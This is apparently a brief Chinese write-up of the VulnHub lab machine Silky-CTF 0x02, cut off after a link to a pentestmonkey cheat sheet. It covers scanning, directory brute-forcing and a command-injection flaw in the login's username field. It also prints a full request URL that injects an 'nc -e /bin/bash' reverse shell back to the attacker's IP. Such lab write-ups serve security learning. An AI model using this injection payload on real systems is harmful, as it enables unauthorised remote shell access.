https://www.vulnhub.com/entry/silky-ctf-0x02,307/ 主机扫描: HTTP进行目录爆破 尝试SQL注入会被封掉IP 经过尝试发现username字段存在命令执行的漏洞 我们执行进行shell反弹 http://10.10.202.131/admin.php?username=nc%20-e%20/bin/bash%2010.10.202.132%201234&password=123456 http://pentestmonkey.net/che...